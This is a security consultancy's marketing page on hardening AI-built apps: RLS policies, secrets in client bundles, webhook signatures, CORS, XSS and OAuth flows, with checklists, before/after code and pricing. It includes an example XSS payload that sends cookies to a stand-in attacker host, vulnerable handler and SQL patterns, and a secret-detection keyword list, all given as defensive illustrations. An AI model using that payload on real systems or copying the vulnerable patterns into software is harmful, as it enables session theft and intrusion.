afterbuild/ops
§ EX-06/security-hardening-expert
AI app security hardening expert

AI app security hardening — patch the RLS, secrets, and webhook gaps Lovable and Bolt shipped with

By Hyder Shah · 13 min read · Last updated 2026-04-15
Quick verdict

AI app security hardening is not optional. 48% of AI-generated code ships with vulnerabilities, Supabase RLS hardening is skipped on ~70% of the Lovable apps we audit, webhook signature verification is routinely absent, and a full secrets audit of an AI app usually finds keys in the client bundle. We audit every OWASP category, patch RLS, rotate secrets, sign webhooks, and ship a written report in 48 hours for a fixed $499. Updated Q2 2026: OWASP Top 10 for LLM Applications v2.0 shipped in January, and most AI-built apps hit 7+ of its 10 categories; California AB-2630, effective April 2026, now requires breach disclosure for AI-generated apps.

Why AI builders ship broken AI app security hardening

Security is the thing AI coding tools are worst at, by a wide margin. Veracode's 2025 report found that 48% of AI-generated code contains vulnerabilities — roughly one in two files. The Register documented 170 Lovable apps leaking data from over 18,000 users in a single incident. NIST assigned CVE-2025-53773 (CVSS 9.6) to GitHub Copilot. The problem isn't a bad prompt; it's that the models optimize for demo-ability, and every security control is friction on the demo.

The specific patterns we see almost every time: Supabase Row Level Security disabled (or 'enabled' with policies that allow anyone to read everything); secrets hardcoded into the client bundle; OAuth callbacks misconfigured so tokens are exchanged insecurely; no rate limits, so your app can be scraped or DoS'd; CSRF protection missing on mutating endpoints; user input passed straight to SQL or HTML; CORS set to '*' because that was the fastest way to make the preview work. Every one of these is catastrophic at launch. Every one is a half-day fix if you know what you're doing. New in Q1 2026: we are now seeing prompt injection attacks against AI-generated admin dashboards — LLM-backed features (summaries, inline copilots, chat panels) that accept user-supplied text without sanitization can be steered into exfiltrating private data, and AI builders rarely ship the allowlist checks that stop it.

Source: The Register — 170 Lovable apps leaked 18k users' data

§ MATRIX/ai-builder / failure-mode

Which AI builder shipped your broken AI app security hardening?

The AI app security hardening failure mode usually depends on the tool that shipped the code. Find your builder below, then read the matching problem page.

AI builder | What breaks in AI app security hardening | Go to
Lovable | RLS disabled on ~70% of apps; Supabase public key granting full access | Lovable RLS fix
Bolt.new | Hardcoded secrets in client bundle; Stripe webhooks unverified | Bolt security
v0 | Backend-less; when a backend is added, no rate limits and no input validation | v0 auth
Cursor | Security drifts across files; OAuth flow sometimes split insecurely | Cursor rescue
Replit Agent | Secrets in repl env exposed; public URLs by default | Replit rescue
Claude Code | Generally better — still misses rate limits and CORS hardening | Claude Code rescue
Windsurf | Enterprise compliance gaps — audit logs, RBAC, SSO misconfig | Windsurf compliance
Base44 | Proprietary runtime; we audit and migrate to an owned stack if needed | Base44 rescue
§ ANATOMY/ai app security hardening / failure

Anatomy of the 170-Lovable-apps breach — and how AI-built apps keep repeating it

The Register documented the pattern in February 2026: 170 Lovable-built apps leaked data from over 18,000 users in a single disclosure wave. The failure mode, quoted directly from the case study, was 'authenticated users were blocked; unauthenticated visitors had full access to all data.' That is not a missing policy — that is an inverted policy. The RLS rule was present, but its condition was reversed, and the Supabase anon key (which ships in every client bundle by design) became an open door to the entire database.
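For concreteness, a hedged sketch of the inverted policy next to the corrected one. The table and column names (`profiles`, `user_id`) are hypothetical, not taken from the disclosed apps:

```sql
-- BROKEN (hypothetical reconstruction of the inverted shape):
-- the condition passes for unauthenticated requests and fails for real users.
create policy "profiles_read" on profiles
  for select using (auth.uid() is null);

-- FIXED: RLS on, and each user reads only their own row.
alter table profiles enable row level security;
create policy "profiles_read_own" on profiles
  for select using (auth.uid() = user_id);
```

The anon key stays in the client bundle either way; the policy condition is the only thing standing between it and the table.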

The upstream cause is demo-ability. Lovable, Bolt, v0, and their peers optimize for the moment the founder says 'wow, it works.' Every security control adds friction to that moment. RLS breaks the happy path during iteration, so the AI disables it. Rate limits make the model's test loop slow, so they go unimplemented. CORS restrictions block the preview, so CORS gets set to '*' and stays that way. Webhook signing secrets require a production environment to test, so the webhook handler just returns 200. Every individual decision is pragmatic for the demo and catastrophic at launch.


A practical illustration: a seed-stage SaaS reached us two days before their pen-test. Bolt.new had shipped them an admin panel gated by a client-side `if (user.role === 'admin') { show(<AdminPanel/>) }` check. The route itself was not protected server-side. A single DevTools edit to the user object bypassed the gate and exposed every admin API the UI called. The admin APIs, in turn, trusted the client's claim because the AI had not written server-side role verification. The pen-tester would have found it in ten minutes. We fixed it in two hours: role checks moved to server middleware, RLS policies added for admin-scoped tables, and a test that logs in as a regular user and attempts every admin route was wired into CI. The pen-test report came back clean on those vectors. The founder asked, justifiably: how was this ever supposed to work? It wasn't. The AI shipped the shape of a secured admin panel without the substance.
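The server-side shape of that two-hour fix can be sketched in a few lines; `Session` and `requireAdmin` are illustrative names, not the client's actual middleware:

```typescript
// Server-side role verification: the check derives from the session,
// never from a client-supplied user object. Names are illustrative.
type Session = { userId: string; role: "admin" | "user" } | null;

function requireAdmin(session: Session): { userId: string } {
  // A DevTools edit to client state cannot influence this branch.
  if (!session || session.role !== "admin") {
    throw new Error("403: admin role required");
  }
  return { userId: session.userId };
}

// A regular user hitting an admin route is rejected.
const session: Session = { userId: "u1", role: "user" };
let blocked = false;
try {
  requireAdmin(session);
} catch {
  blocked = true;
}
console.log(blocked); // true
```

The CI test described above is the same function exercised with a non-admin session against every admin route.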

Veracode's 2025 State of Software Security confirmed the scale: 48% of AI-generated code contains known vulnerabilities. That is not a prediction — it is measured across a multi-year benchmark. Combined with NIST's CVE-2025-53773 (CVSS 9.6) against GitHub Copilot's auto-generated code paths, the evidence is unambiguous: AI-generated code is materially less secure than its human-written equivalent, and the delta is not shrinking. A security hardening pass is not optional for a launched AI-built app; it is the difference between running a real business and becoming the next disclosure headline.

When we audit, the same eight categories surface over and over: RLS disabled or inverted, secrets in the client bundle, webhook handlers without signature checks, CORS set to '*', no rate limiting, input pipes straight to SQL or HTML, OAuth redirects leaking tokens in URL fragments, and missing security headers (CSP, HSTS, X-Frame-Options). Each is a 2-to-8 hour fix individually. The value of the engagement is that we do them all, consistently, before a real user — or a researcher — finds them for you.
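For the headers category, a sketch of the baseline set we typically deploy (the CSP value is illustrative and always tuned per app):

```typescript
// Illustrative baseline security headers; CSP in particular is per-app.
const securityHeaders = [
  { key: "Strict-Transport-Security", value: "max-age=63072000; includeSubDomains; preload" },
  { key: "X-Frame-Options", value: "DENY" },
  { key: "X-Content-Type-Options", value: "nosniff" },
  { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" },
  { key: "Content-Security-Policy", value: "default-src 'self'; frame-ancestors 'none'" },
];

// In Next.js these would be returned from headers() in next.config.js;
// shown as plain data here to stay framework-agnostic.
console.log(securityHeaders.map((h) => h.key).join(", "));
```

Each entry maps directly to one of the missing-header findings the audit flags.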

§ RESCUE/ai app security hardening / engagement

What an AI app security hardening rescue engagement ships

From first diagnostic to production handoff — the explicit steps on every AI app security hardening engagement.

  1. Free diagnostic

     We scan your repo and live URL for the top 10 AI-built-app failure modes: RLS, secrets, CORS, webhooks, rate limits, auth, input validation, CSP, CSRF, IDOR. Written triage in 48 hours.

  2. $499 security audit

     Full written audit — every finding has a severity (critical/high/medium/low), CWE reference, file/line, and a specific patch. Delivered in 48 hours.

  3. Critical fixes first

     We patch everything critical and high in the same engagement if you want — RLS policies written and tested, secrets rotated and moved to env, webhook signature verification added, rate limits wired up.

  4. Regression guards

     We add automated checks so the AI can't reintroduce the holes: Zod validation at API boundaries, CSP headers, lint rules banning dangerouslySetInnerHTML, CI checks for hardcoded secrets.

  5. Written handoff

     You get the report, the patches, and a runbook: what to watch, what to rotate annually, what to add to the pentest when you raise your Series A.
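The CI secret check in step 04 can be as small as a regex pass over the built bundle. A minimal sketch, with an illustrative (not exhaustive) pattern list:

```typescript
// Minimal secret scanner: flags common key shapes in a text blob.
// Pattern list is illustrative; extend per provider.
const SECRET_PATTERNS: [string, RegExp][] = [
  ["stripe-live", /sk_live_[0-9a-zA-Z]{10,}/],
  ["stripe-test", /sk_test_[0-9a-zA-Z]{10,}/],
  ["supabase-service-role", /service_role/],
  ["generic-api-key", /API_KEY\s*[:=]\s*['"][^'"]{16,}['"]/],
];

function scanForSecrets(text: string): string[] {
  return SECRET_PATTERNS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// A bundle containing a live Stripe key fails the build.
const findings = scanForSecrets('const k = "sk_live_abc123DEF456ghi";');
console.log(findings); // ["stripe-live"]
```

In CI this runs against the build output directory and exits non-zero on any match.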

§ AUDIT/ai app security hardening / first-pass

Every AI app security hardening rescue audit checks

The diagnostic pass on every AI app security hardening rescue. Each item takes under 10 minutes; together they cover the patterns that cause 90% of AI-built-app failures.

  1. Supabase RLS on every table

     We enumerate every table and check: is RLS enabled, and is at least one non-trivial policy defined? Policies like `USING (true)` are flagged — they satisfy the 'enabled' check without enforcing anything.

  2. Anon-key surface mapping

     We map every read and write the anon key can perform. If the anon key can read any user-private table, it's critical.

  3. Secrets grep across the client bundle

     The built JS bundle is greppable. We search for `sk_live_`, `sk_test_`, `service_role`, `API_KEY`, and other common secret patterns. Every match is a critical finding.

  4. Webhook signature verification

     Stripe, GitHub, Clerk — every webhook handler must verify the signature before acting. Unverified handlers are trivially forgeable.

  5. Rate limits on auth endpoints

     Sign-up, sign-in, password reset. No rate limit means DoS-able and brute-forceable. We check for Upstash, Vercel Edge rate limits, or middleware.

  6. Input validation with Zod or equivalent

     Every API route must parse req.body before it reaches the database. Raw concatenation into SQL or HTML is a critical finding (OWASP A03).

  7. CORS policy

     Access-Control-Allow-Origin should be an explicit allowlist, not '*'. We check every API response.

  8. CSP, HSTS, and security headers

     We run Mozilla Observatory against the live URL. Scores under B are flagged; we tune next.config.js to ship the right headers.

  9. OAuth redirect and token flow

     Tokens should arrive via POST, not URL fragment. Redirect URIs should exactly match provider allowlists. Token refresh should be server-side.

  10. IDOR checks on object access

      Can user A access user B's object by guessing the ID? We test every authenticated GET, PATCH, and DELETE with the wrong user's UUID.

  11. Dependency CVE scan

      npm audit or pnpm audit, cross-referenced with NIST NVD. Known criticals in shipped dependencies are flagged.
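Check 04 is the one founders most often ask to see. Below is a dependency-free sketch of Stripe-style verification: HMAC-SHA256 over `timestamp.rawBody`, compared in constant time. In production, `stripe.webhooks.constructEvent` does this for you; the secret here is a made-up placeholder.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Sketch of Stripe-style webhook verification. The header carries
// "t=<timestamp>,v1=<hex sig>"; the signed payload is "<t>.<rawBody>".
function verifySignature(rawBody: string, header: string, secret: string): boolean {
  const parts = Object.fromEntries(
    header.split(",").map((kv) => kv.split("=") as [string, string]),
  );
  if (!parts.t || !parts.v1) return false;
  const expected = createHmac("sha256", secret)
    .update(`${parts.t}.${rawBody}`)
    .digest("hex");
  const a = Buffer.from(expected, "hex");
  const b = Buffer.from(parts.v1, "hex");
  // Constant-time comparison; length guard because timingSafeEqual throws otherwise.
  return a.length === b.length && timingSafeEqual(a, b);
}

// Forged payloads fail; a correctly signed one passes.
const secret = "whsec_demo"; // placeholder, not a real key
const body = '{"order_id":"ord_1"}';
const t = "1700000000";
const sig = createHmac("sha256", secret).update(`${t}.${body}`).digest("hex");
console.log(verifySignature(body, `t=${t},v1=${sig}`, secret)); // true
console.log(verifySignature(body, `t=${t},v1=${"0".repeat(64)}`, secret)); // false
```

A real handler also rejects stale timestamps and stores an idempotency key, as the diff section below notes.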

§ DIFF/ai app security hardening / before-after

Common AI app security hardening patterns we fix

These are the shapes AI-generated code arrives in — and the shape we leave behind.

RLS disabled 'because it was blocking the demo'
✕ before · ai-shipped
`ALTER TABLE users DISABLE ROW LEVEL SECURITY;` — anon key reads and writes every row. The 170-Lovable-apps pattern.
✓ after · afterbuild
RLS enabled; policies scoped with `auth.uid() = user_id` on owning tables and role-checked on admin tables. Tested against every role.
The signature-less webhook
✕ before · ai-shipped
`export async function POST(req) { const body = await req.json(); await markOrderPaid(body.order_id); return new Response('ok'); }` — anyone can POST.
✓ after · afterbuild
Stripe-Signature header parsed, constructEvent called with the webhook secret, handler runs only on verified events. Idempotency key stored to prevent replay.
The service-role key in the browser
✕ before · ai-shipped
`NEXT_PUBLIC_SUPABASE_SERVICE_ROLE_KEY=...` in .env. The key ships in the client bundle; every user's browser has full admin access.
✓ after · afterbuild
Service-role key confined to server routes and environment. Client uses the anon key only. Env var named without the NEXT_PUBLIC_ prefix; a pre-flight check enforces this.
The wide-open CORS
✕ before · ai-shipped
`Access-Control-Allow-Origin: *` on every API response. Any origin can call your API with browser-held cookies.
✓ after · afterbuild
Explicit allowlist keyed to deployment environment. Production allows only your domain; preview allows your preview URL.
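A minimal sketch of that allowlist shape, with placeholder domains:

```typescript
// Environment-keyed CORS allowlist: echo the origin back only when it
// is explicitly allowed; never "*" on authenticated routes.
const ALLOWED_ORIGINS: Record<string, string[]> = {
  production: ["https://app.example.com"],
  preview: ["https://preview.example.com"],
};

function corsOriginFor(requestOrigin: string, env: string): string | null {
  const allowed = ALLOWED_ORIGINS[env] ?? [];
  // Exact-match comparison; substring checks are a classic bypass.
  return allowed.includes(requestOrigin) ? requestOrigin : null;
}

console.log(corsOriginFor("https://app.example.com", "production")); // "https://app.example.com"
console.log(corsOriginFor("https://evil.example", "production")); // null
```

A `null` return means the middleware omits the Access-Control-Allow-Origin header entirely, so the browser blocks the cross-origin read.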
SQL concatenation in a Supabase RPC
✕ before · ai-shipped
`create function search(q text) returns table(...) as $$ ... where name like '%' || q || '%' $$` — when the query is assembled as dynamic SQL (EXECUTE plus string concatenation), injection is trivial once the attacker closes the quote.
✓ after · afterbuild
Parameterized queries, `format()` with `%L`, or prepared statements, with input validation before the call.
User HTML rendered with dangerouslySetInnerHTML
✕ before · ai-shipped
Comments or bios rendered via `dangerouslySetInnerHTML`. A user injects `<script>fetch('https://attacker.com/?c='+document.cookie)</script>`.
✓ after · afterbuild
DOMPurify sanitization, or render as plain text, or restrict to a markdown subset with a vetted renderer.
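When plain text is enough, escaping beats sanitizing. A minimal escape helper for the plain-text path:

```typescript
// Escape the five HTML-significant characters instead of trusting user HTML.
// For rich text, a vetted sanitizer (e.g. DOMPurify) is the better tool.
function escapeHtml(input: string): string {
  const map: Record<string, string> = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

const bio = "<script>fetch('https://attacker.com/?c='+document.cookie)</script>";
console.log(escapeHtml(bio).includes("<script>")); // false
```

The payload above survives the round trip as inert visible text rather than executable markup.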
OAuth tokens in the URL fragment
✕ before · ai-shipped
The OAuth callback returns `#access_token=...`, which JavaScript parses client-side. Tokens leak to analytics, referrers, and browser history.
✓ after · afterbuild
PKCE + server-side token exchange. Tokens never touch the URL. Session cookie set HttpOnly, Secure, SameSite=Lax.
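The PKCE half of that fix, sketched with Node's crypto per RFC 7636's S256 method; the function names are ours, not a library API:

```typescript
import { createHash, randomBytes } from "node:crypto";

// PKCE sketch: the client generates a random verifier, sends only its
// SHA-256 challenge in the authorize request, and proves possession of
// the verifier at the server-side token exchange. Tokens never ride in
// a URL fragment.
function pkcePair() {
  const verifier = randomBytes(32).toString("base64url");
  const challenge = createHash("sha256").update(verifier).digest("base64url");
  return { verifier, challenge };
}

// Server-side check at token exchange (RFC 7636, S256 method).
function challengeMatches(verifier: string, challenge: string): boolean {
  return createHash("sha256").update(verifier).digest("base64url") === challenge;
}

const { verifier, challenge } = pkcePair();
console.log(challengeMatches(verifier, challenge)); // true
console.log(challengeMatches("wrong-verifier", challenge)); // false
```

The access token itself then travels only in the POST response of the exchange and lands in an HttpOnly cookie.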
§ FLAGS/ai app security hardening / red-signals

AI app security hardening red flags in AI-built code

If any of these are true in your repo, the rescue is probably worth more than the rewrite.

signal | why it matters
Supabase anon key can read user_emails, user_profiles, or similar tables when tested anonymously | RLS is disabled or the policy is trivial. Direct path to the 170-Lovable-apps failure mode.
Client bundle contains a string matching `sk_live_` or `sk_test_` | The Stripe secret key is in the browser. Revoke immediately and rotate.
Webhook handler returns 200 without reading `Stripe-Signature` | Forgeable webhook. Any attacker can flip orders to paid, trigger refunds, or spoof subscription events.
`Access-Control-Allow-Origin: *` on authenticated API routes | CSRF becomes trivial when combined with cookie-based auth.
Password reset links include the token as a URL query parameter, not a POST body | Tokens leak to analytics, referrers, proxies, and browser history. Classic token leakage.
No rate limit on /api/auth/signup or /api/auth/reset-password | Trivially brute-forceable. Credential stuffing and account enumeration run uncontested.
User-supplied HTML rendered via dangerouslySetInnerHTML without a sanitizer | Stored XSS. The attacker owns every viewer's session.
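For the rate-limit flag, the core logic is small. An in-memory fixed-window sketch; production deployments back this with a shared store (e.g. Upstash Redis) so limits survive serverless instance churn:

```typescript
// Fixed-window rate limiter: N attempts per key per window.
class FixedWindowLimiter {
  private hits = new Map<string, { windowStart: number; count: number }>();
  constructor(private limit: number, private windowMs: number) {}

  allow(key: string, now: number = Date.now()): boolean {
    const entry = this.hits.get(key);
    if (!entry || now - entry.windowStart >= this.windowMs) {
      // New key or expired window: start a fresh count.
      this.hits.set(key, { windowStart: now, count: 1 });
      return true;
    }
    entry.count += 1;
    return entry.count <= this.limit;
  }
}

// 5 attempts per minute per IP on an auth endpoint.
const limiter = new FixedWindowLimiter(5, 60_000);
const results = Array.from({ length: 6 }, () => limiter.allow("203.0.113.7", 1_000));
console.log(results); // [true, true, true, true, true, false]
```

Keying by IP is the baseline; keying by account identifier as well blocks distributed credential stuffing against one user.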
§ PRICING/ai app security hardening / fixed-price

Fixed-price AI app security hardening engagements

No hourly meter. Scope agreed up front, written fix plan, delivered on date.

engagement | price | scope
Free diagnostic | Free | Top-10 scan + written triage in 48 hours.
Security audit (featured) | $499 | Full written audit, 48hr turnaround, every finding with a patch.
Emergency triage | From $499 | Mid-incident? 24hr response + fix plan.
Break the fix loop | $3,999 | Audit + critical fixes + regression guards + tests.
§ EXAMPLES/ai app security hardening / real-scopes

What AI app security hardening rescues actually cost

Anonymized, representative scopes from recent AI app security hardening rescues. Every price is the one we actually quoted.

Small rescue
$1,499

A founder who built a Lovable habit-tracker, has 90 beta users, and is scared to launch publicly after reading The Register piece. We audit, surface 11 findings (3 critical), write the RLS policies, and wire up webhook signing.

Scope
48-hour audit + critical and high remediation. RLS policies, webhook signing, secret rotation, env var guards.
Duration
1 week
Medium rescue
$3,999

A seed-stage SaaS on Bolt + Supabase preparing for SOC 2 Type 1. Enterprise customer asked for a third-party security review in the sales cycle.

Scope
Full audit, remediation of every critical and high, CSP implementation, audit log bootstrap, pen-test prep document.
Duration
3 weeks
Large rescue
$12,499+

A growth-stage fintech with a Lovable admin tool processing real money. Regulatory inquiry triggered a security review with a 60-day remediation window.

Scope
Full audit, remediation including auth overhaul, RBAC, audit logs, SIEM integration, and formal response to the inquiry's findings.
Duration
6-8 weeks
§ DECISION/ai app security hardening / migrate-or-patch

Patch in place, hard-rotate secrets, or full auth migration?

Roughly 70% of security engagements are patches in place: enable RLS, sign the webhooks, move secrets to server-side env vars, deploy security headers. The app stays where it is, the team keeps using their AI builder, and the rescue ships in a week, leaving the original codebase materially safer with no architectural change.

About 20% require a hard secret rotation alongside the patches. The signal is that secrets have been in the client bundle for long enough — or visible in a public Git history — that the right assumption is they are compromised. Stripe restricted keys can be revoked in seconds; Supabase service role keys require a project-level rotation that can disrupt active sessions; OAuth client secrets need coordination with the provider's allowlist. We sequence the rotation to minimize user impact and document every step in case a future incident requires re-examining the timeline.

The remaining 10% need a full auth migration. The signal is that the auth provider itself has been mis-implemented in a way that can't be patched cleanly — for example, sessions stored in localStorage instead of HttpOnly cookies, or roles stored in a JWT claim without server-side verification. In those cases we recommend moving to Clerk or rebuilding on Supabase Auth with the patterns done correctly. The migration is invisible to most users (a passwordless re-verification email plus a one-shot token exchange), but it does require a planned cutover window and a rollback plan. We run this migration often enough that the cutover playbook is standard.

§ RUNBOOK/ai app security hardening / references

AI app security hardening runbook and reference material

The documentation, CLIs, and specs we rely on for every AI app security hardening engagement. We cite, we don't improvise.

§ FAQ/ai app security hardening / founders-ask

AI app security hardening questions founders ask

FAQ
How bad is AI-generated code for AI app security hardening?
Veracode 2025: 48% contains vulnerabilities. The Register documented 170 Lovable apps leaking 18,000 users' data through disabled RLS. NIST assigned CVE-2025-53773 (CVSS 9.6) to a GitHub Copilot issue. AI app security hardening is not hypothetical — the bad apps hit the news regularly. The numbers are getting worse as models get better at producing convincing code that hides its flaws under more sophisticated layers.
What is the most common Supabase RLS hardening finding?
Supabase RLS hardening lands on disabled or misconfigured row-level security. Roughly 70% of Lovable apps we audit have RLS off on at least one table. Combined with the fact that the Supabase anon key ships in the client bundle, this means anyone can read the entire database. The second most common is webhook handlers without signature verification — equally serious, equally easy to fix once spotted.
Can I stay on Lovable during AI app security hardening?
Yes. AI app security hardening runs against your existing Supabase project and deploy target. RLS policies, secrets audit, webhook signature verification — all done in place. You keep using Lovable for UI iteration; we harden the backend they shipped. The catch is that Lovable's chat-driven edits will sometimes try to undo your hardening; we install lint rules and CI checks that block those regressions.
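One of those regression guards, sketched as an ESLint config fragment (the selector may need tuning for your parser setup):

```javascript
// .eslintrc.cjs fragment: fail the build if chat-driven edits reintroduce
// raw HTML injection. Uses the stock no-restricted-syntax rule.
module.exports = {
  rules: {
    "no-restricted-syntax": [
      "error",
      {
        selector: "JSXAttribute[name.name='dangerouslySetInnerHTML']",
        message: "Sanitize with DOMPurify or render as text. See the security runbook.",
      },
    ],
  },
};
```

Because the rule runs in CI, a regenerated component that sneaks the attribute back in fails the pipeline before it deploys.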
What does a 48-hour secrets audit for an AI app deliver?
A secrets audit AI app report includes a written PDF + markdown document with every finding categorized (critical/high/medium/low), CWE reference, file/line number, and a specific patch or fix recommendation. Plus a 30-min call to walk through it. The report is structured so a future engineer or compliance reviewer can pick it up cold and understand each finding without rereading the source code.
Do you run full pentests or just AI app security hardening?
We focus on application-layer AI app security hardening. If you need an ISO 27001 or SOC 2 pentest, we refer you to partners and brief them with our audit so they hit the ground running. Most pentest partners we work with have noted that our audits cover roughly 70% of what their automated scanners would have flagged, which means their human time is spent on the genuinely interesting findings.
How does AI app security hardening handle GDPR and compliance?
We cover the technical prerequisites that AI app security hardening touches — data minimization, encryption at rest, audit logs, right-to-delete. We're not lawyers, so we don't write your privacy policy. We can however connect you to lawyers who specialize in tech privacy and have a working understanding of what AI-built apps look like.
Is $499 really enough for real AI app security hardening?
For a typical Lovable/Bolt/v0 MVP, yes. AI app security hardening at this tier uses a standardized 10-point checklist against known AI-builder failure modes. Larger apps quote proportionally. The reason the price stays low for small apps is that the patterns repeat — finding the 12th hardcoded secret during a secrets audit AI app takes about as long as finding the first.
A security researcher contacted me — can you handle emergency AI app security hardening?
Email us. The first hour of emergency AI app security hardening is triage — what was reported, what is the actual exposure, what is the immediate fix. We draft a response to the researcher, scope a same-day patch (usually Supabase RLS hardening or webhook signature verification), and write a post-incident note for customers if disclosure is required. The playbook is well-rehearsed.
How do I know the AI app security hardening lasted after handoff?
Two ways. First, every AI app security hardening fix ships with an automated check in CI that fails the build if the protection is removed — lint rule, Zod schema, CSP header, RLS pgTAP test. Second, we offer a quarterly mini-audit retainer that re-runs the checklist against the current main branch and reports any regressions. Most clients run it once and decide whether to commit to the cadence based on the result.
Next step

Your AI builder shipped broken AI app security hardening. We ship the fix.

Send the repo. We'll tell you exactly what's wrong in your AI app security hardening layer — and the fixed price to ship it — in 48 hours.

Book free diagnostic →